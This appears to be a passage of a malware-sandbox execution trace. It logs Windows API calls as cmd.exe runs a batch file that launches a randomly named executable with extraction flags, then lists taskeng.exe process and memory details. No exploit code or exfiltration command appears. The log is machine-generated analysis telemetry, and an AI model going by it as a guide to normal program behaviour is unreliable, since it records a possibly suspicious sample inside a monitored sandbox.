returned 0x3c [0299.671] GetFileType (hFile=0x3c) returned 0x2 [0299.671] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0299.671] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf288 | out: lpMode=0xfcf288) returned 1 [0299.671] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.671] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcf2a0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf2a0*=0x2) returned 1 [0299.672] GetConsoleTitleW (in: lpConsoleTitle=0xfcedc8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0299.672] GetFileAttributesW (lpFileName="vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x20 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0299.672] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0299.673] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0299.674] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0299.674] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0299.674] _wcsicmp (_String1="vIDhS3md.exe", _String2="FOR") returned 16 [0299.674] _wcsicmp (_String1="vIDhS3md.exe", _String2="IF") returned 13 [0299.674] _wcsicmp (_String1="vIDhS3md.exe", _String2="REM") returned 4 [0299.674] _wcsnicmp (_String1="vIDh", _String2="cmd ", _MaxCount=0x4) returned 19 [0299.674] SetErrorMode (uMode=0x0) returned 0x0 [0299.674] SetErrorMode (uMode=0x1) returned 0x0 [0299.674] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x127f9d0, lpFilePart=0xfce8d4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xfce8d4*="Desktop") returned 0x1d [0299.674] SetErrorMode (uMode=0x0) returned 0x1 [0299.674] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0299.674] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0299.674] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0299.674] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0299.674] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", fInfoLevelId=0x1, lpFindFileData=0xfce680, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfce680) returned 0x127eda8 [0299.674] FindClose (in: hFindFile=0x127eda8 | out: hFindFile=0x127eda8) returned 1 [0299.675] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0299.675] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0299.675] GetConsoleTitleW (in: lpConsoleTitle=0xfceb54, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0299.675] InitializeProcThreadAttributeList (in: lpAttributeList=0xfcea80, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xfcea64 | out: lpAttributeList=0xfcea80, lpSize=0xfcea64) returned 1 [0299.675] UpdateProcThreadAttribute (in: lpAttributeList=0xfcea80, dwFlags=0x0, Attribute=0x60001, lpValue=0xfcea6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xfcea80, lpPreviousValue=0x0) returned 1 [0299.675] GetStartupInfoW (in: lpStartupInfo=0xfceab8 | out: lpStartupInfo=0xfceab8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="FN=\"res", _MaxCount=0x7) returned -3 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0299.675] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0299.676] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0299.676] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0299.676] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0299.676] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0299.676] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0299.676] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0299.676] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0299.676] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0299.676] lstrcmpW (lpString1="\\vIDhS3md.exe", lpString2="\\XCOPY.EXE") returned -1 [0299.676] CreateProcessW (in: lpApplicationName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", lpCommandLine="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xfcea08*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xfcea54 | out: lpCommandLine="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0xfcea54*(hProcess=0xb8, hThread=0xcc, dwProcessId=0xe54, dwThreadId=0xce8)) returned 1 [0299.681] CloseHandle (hObject=0xcc) returned 1 [0299.681] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0299.681] GetEnvironmentStringsW () returned 0x127e078* [0299.681] FreeEnvironmentStringsA (penv="=") returned 1 [0299.681] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0301.091] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0xfce9ec | out: lpExitCode=0xfce9ec*=0x1) returned 1 [0301.091] CloseHandle (hObject=0xb8) returned 1 [0301.091] _vsnwprintf (in: _Buffer=0xfcead4, _BufferCount=0x13, _Format="%08X", _ArgList=0xfce9f4 | out: _Buffer="00000001") returned 8 [0301.091] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0301.091] GetEnvironmentStringsW () returned 0x127cd58* [0301.091] FreeEnvironmentStringsA (penv="=") returned 1 [0301.091] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0301.091] GetEnvironmentStringsW () returned 0x127e078* [0301.091] FreeEnvironmentStringsA (penv="=") returned 1 [0301.091] DeleteProcThreadAttributeList (in: lpAttributeList=0xfcea80 | out: lpAttributeList=0xfcea80) [0301.091] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.091] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0301.117] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.117] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0301.117] _get_osfhandle (_FileHandle=0) returned 0x38 [0301.117] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0301.117] SetConsoleInputExeNameW () returned 0x1 [0301.117] GetConsoleOutputCP () returned 0x1b5 [0301.118] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0301.118] SetThreadUILanguage (LangId=0x0) returned 0x409 [0301.118] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xfcf3b4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0301.118] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0301.118] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.118] SetFilePointer (in: hFile=0xb8, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0301.119] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.119] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0301.119] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xfcf384, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xfcf384*=0x0, lpOverlapped=0x0) returned 1 [0301.119] GetLastError () returned 0x0 [0301.119] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.119] GetFileType (hFile=0xb8) returned 0x1 [0301.119] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.119] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0301.119] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.119] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0301.119] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xfcf384, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xfcf384*=0x0, lpOverlapped=0x0) returned 1 [0301.119] GetLastError () returned 0x0 [0301.119] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.119] GetFileType (hFile=0xb8) returned 0x1 [0301.119] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.119] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0301.119] longjmp () [0301.119] _tell (_FileHandle=3) returned 226 [0301.119] _close (_FileHandle=3) returned 0 [0301.120] CmdBatNotificationStub () returned 0x1 [0301.120] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.120] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0301.120] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.120] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0301.120] _get_osfhandle (_FileHandle=0) returned 0x38 [0301.120] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0301.120] SetConsoleInputExeNameW () returned 0x1 [0301.120] GetConsoleOutputCP () returned 0x1b5 [0301.120] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0301.120] SetThreadUILanguage (LangId=0x0) returned 0x409 [0301.121] exit (_Code=1) Thread: id = 883 os_tid = 0x4e8 Process: id = "96" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x78834000" os_pid = "0x72c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x318" cmd_line = "taskeng.exe {11D15CB3-428A-49D4-BA71-4E4ADA506DB6} S-1-5-18:NT AUTHORITY\\System:Service:" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xe], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b566" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 7047 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7048 start_va = 0x2bbf620000 end_va = 0x2bbf63ffff entry_point = 0x0 region_type = private name = "private_0x0000002bbf620000" filename = "" Region: id = 7049 start_va = 0x2bbf640000 end_va = 0x2bbf653fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002bbf640000" filename = "" Region: id = 7050 start_va = 0x2bbf660000 end_va = 0x2bbf6dffff entry_point = 0x0 region_type = private name = "private_0x0000002bbf660000" filename = "" Region: id = 7051 start_va = 0x2bbf6e0000 end_va = 0x2bbf6e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002bbf6e0000" filename = "" Region: id = 7052 start_va = 0x7df5ff130000 end_va = 0x7ff5ff12ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff130000" filename = "" Region: id = 7053 start_va = 0x7ff721980000 end_va = 0x7ff7219a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff721980000" filename = "" Region: id = 7054 start_va = 0x7ff7219a8000 end_va = 0x7ff7219a8fff entry_point = 0x0 region_type = private name = "private_0x00007ff7219a8000" filename = "" Region: id = 7055 start_va = 0x7ff7219ae000 end_va = 0x7ff7219affff entry_point = 0x0 region_type = private name = "private_0x00007ff7219ae000" filename = "" Region: id = 7056 start_va = 0x7ff7224f0000 end_va = 0x7ff72253cfff entry_point = 0x7ff7224f0000 region_type = mapped_file name = "taskeng.exe" filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe") Region: id = 7057 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7059 start_va = 0x2bbf6f0000 end_va = 0x2bbf6f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002bbf6f0000" filename = "" Region: id = 7060 start_va = 0x2bbf700000 end_va = 0x2bbf701fff entry_point = 0x0 region_type = private name = "private_0x0000002bbf700000" filename = "" Region: id = 7737 start_va = 0x2bbf840000 end_va = 0x2bbf93ffff entry_point = 0x0 region_type = private name = "private_0x0000002bbf840000" filename = "" Region: id = 7738 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7739 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7740 start_va = 0x2bbf620000 end_va = 0x2bbf62ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002bbf620000" filename = "" Region: id = 7741 start_va = 0x7ff721880000 end_va = 0x7ff72197ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff721880000" filename = "" Region: id = 7742 start_va = 0x2bbf710000 end_va = 0x2bbf7cdfff entry_point = 0x2bbf710000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7743 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7744 start_va = 0x2bbf940000 end_va = 0x2bbf9bffff entry_point = 0x0 region_type = private name = "private_0x0000002bbf940000" filename = "" Region: id = 7745 start_va = 0x7ff7219ac000 end_va = 0x7ff7219adfff entry_point = 0x0 region_type = private name = "private_0x00007ff7219ac000" filename = "" Region: id = 7746 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7747 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 7748 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7749 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7750 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff 